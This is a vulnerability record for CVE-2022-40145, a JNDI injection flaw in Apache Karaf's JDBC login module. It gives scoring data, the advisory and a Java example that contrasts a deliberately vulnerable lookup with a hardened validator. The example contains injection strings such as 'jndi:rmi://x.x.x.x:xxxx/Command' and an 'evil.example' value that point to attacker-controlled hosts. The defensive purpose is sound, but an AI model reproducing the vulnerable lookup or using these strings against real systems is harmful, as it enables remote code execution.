CVE-2022-40145
Published: 21 December 2022
Summary
CVE-2022-40145 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Apache Karaf. Its CVSS base score is 9.8 (Critical).
Operationally, its EPSS score ranks it in the top 9.7% of CVEs by estimated exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
CVE-2022-40145 is an input-validation flaw in Apache Karaf that permits code injection through an attacker-controlled JNDI URI (an LDAP URI in the advisory's scenario, an RMI URI in its example) supplied as the data-source name of the JDBC JAAS login module. The vulnerable code path is JDBCUtils.doCreateDatasource, which passes the value of the datasource option (JDBCUtils.DATASOURCE) to InitialContext.lookup(jndiName) without filtering, so a jndi: value naming a remote LDAP or RMI server is resolved exactly as configured. The issue affects all releases up to and including Karaf 4.4.1 and 4.3.7.
An attacker who controls the LDAP (or RMI) server referenced by that jndi: URI can answer the lookup with a malicious JNDI reference, causing the Karaf instance to execute arbitrary code. The precondition is that the JdbcLoginModule configuration points at a server the attacker controls; the datasource option is part of Karaf's JAAS configuration rather than something a remote client supplies, so the practical exposure depends on who can write that configuration and who can answer for the named host. Successful exploitation yields full confidentiality, integrity, and availability impact, reflected in the CVSS 9.8 score.
The official Apache Karaf advisory directs users to upgrade to at least 4.4.2 or 4.3.8, which contain a corrected JDBCUtils implementation that no longer passes unfiltered names to JNDI and rejects unsafe JNDI schemes.
EPSS remains flat at 0.0539 with no material increase after disclosure, and no confirmed in-the-wild exploitation has been reported.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-7591
Vulnerability details
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The function JDBCUtils#doCreateDatasource (jaas/modules/src/main/java/org/apache/karaf/jaas/modules/jdbc/JDBCUtils.java) uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8.
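The following is an added illustration, not Karaf's JDBCUtils and not code from the Apache advisory: it places the unfiltered lookup pattern described above next to a hardened variant that allow-lists the scheme of the name before InitialContext.lookup is called. The class, method and constant names (JndiDataSourceGuard, DATASOURCE_OPTION, JNDI_PREFIX, validateJndiName) are hypothetical, the "jndi:" prefix handling and the allowed schemes are assumptions, and only the jndi: branch is modelled (Karaf's "osgi:" form is resolved through the OSGi service registry and is out of scope here). The sample names in main are constructed; one of them is the value quoted in the advisory.

```java
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.sql.DataSource;

/**
 * Illustration of the CVE-2022-40145 lookup pattern next to a hardened form.
 * Hypothetical code: this is not Karaf's JDBCUtils, and the names below only
 * mirror the option described in the advisory.
 */
public final class JndiDataSourceGuard {

    /** Login-module option key; assumed to correspond to JDBCUtils.DATASOURCE. */
    public static final String DATASOURCE_OPTION = "datasource";
    /** Prefix that routes the name to InitialContext.lookup (assumption). */
    public static final String JNDI_PREFIX = "jndi:";
    /** Schemes a data-source name may use once the jndi: prefix is stripped. */
    private static final List<String> ALLOWED_SCHEMES = List.of("java", "osgi");
    private static final Pattern SCHEME = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");

    private JndiDataSourceGuard() {}

    private static String rawName(Map<String, ?> options) {
        Object v = options.get(DATASOURCE_OPTION);
        return v == null ? null : v.toString();
    }

    /** VULNERABLE: whatever follows "jndi:" is handed straight to the JNDI provider. */
    static DataSource vulnerableLookup(Map<String, ?> options) throws NamingException {
        String name = rawName(options);
        if (name == null || !name.startsWith(JNDI_PREFIX)) {
            throw new IllegalArgumentException("only the jndi: form is shown in this illustration");
        }
        // "rmi://x.x.x.x:xxxx/Command" or "ldap://.../Exploit" is accepted here, so the
        // remote server chooses the object (and potentially the code) that comes back.
        return (DataSource) new InitialContext().lookup(name.substring(JNDI_PREFIX.length()));
    }

    /**
     * Returns the JNDI name to look up, or throws IllegalArgumentException when the
     * name could reach a remote naming or directory service.
     */
    public static String validateJndiName(String raw) {
        if (raw == null || raw.isBlank()) {
            throw new IllegalArgumentException("datasource option is empty");
        }
        if (!raw.startsWith(JNDI_PREFIX)) {
            throw new IllegalArgumentException("not a jndi: name: " + raw);
        }
        String name = raw.substring(JNDI_PREFIX.length());
        Matcher m = SCHEME.matcher(name);
        if (!m.find()) {
            throw new IllegalArgumentException("JNDI name has no scheme: " + raw);
        }
        String scheme = m.group(1).toLowerCase();
        if (!ALLOWED_SCHEMES.contains(scheme)) {
            // Rejects ldap:, ldaps:, rmi:, iiop:, dns:, ... regardless of letter case.
            throw new IllegalArgumentException("JNDI scheme not allowed: " + scheme);
        }
        if (name.contains("//")) {
            // A local java:/osgi: name never needs a network authority.
            throw new IllegalArgumentException("JNDI name must not carry a remote authority: " + raw);
        }
        return name;
    }

    /** HARDENED: validate before the name ever reaches the naming provider. */
    static DataSource hardenedLookup(Map<String, ?> options) throws NamingException {
        return (DataSource) new InitialContext().lookup(validateJndiName(rawName(options)));
    }

    public static void main(String[] args) {
        // Constructed inputs: two benign local names, the value quoted in the
        // advisory, and two variants the allow-list must also catch.
        List<String> samples = List.of(
                "jndi:java:comp/env/jdbc/karaf",
                "jndi:osgi:service/javax.sql.DataSource",
                "jndi:rmi://x.x.x.x:xxxx/Command",
                "jndi:LDAP://x.x.x.x:1389/Exploit",
                "jndi:java://evil.example/jdbc/karaf");
        for (String s : samples) {
            try {
                System.out.println("ACCEPT " + validateJndiName(s));
            } catch (IllegalArgumentException e) {
                System.out.println("REJECT " + e.getMessage());
            }
        }
    }
}
```

Compile with `javac JndiDataSourceGuard.java` and run `java JndiDataSourceGuard`; the first two names are accepted and the remaining three rejected (bad scheme, bad scheme despite upper case, allowed scheme but remote authority). The allow-list deliberately names what is permitted rather than what is forbidden, because JNDI providers can be added by classpath. Note also that the JDK default of `com.sun.jndi.ldap.object.trustURLCodebase=false` (since 8u191 / 11.0.1) only blocks remote class loading from an LDAP reference; a server that returns a serialized object still gets it deserialized in-process, so the JDK default is not a substitute for validating the name or upgrading Karaf.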
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls (AI-derived)
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Security testing and evaluation at multiple SDLC stages directly detects missing or flawed input validation, and the associated remediation process ensures that fixes are actually applied.
Security testing and developer training directly verify and enforce proper input validation, reducing the exploitability of injection and malformed-data weaknesses.
Input validation controls check information inputs and reject invalid data before it is processed.
Attack and anomaly monitoring identifies indicators of injection attacks (command, SQL, LDAP/JNDI, etc.) at runtime.
Spam protection mechanisms filter and inspect inbound and outbound messages, compensating for missing or weak input validation of unsolicited content.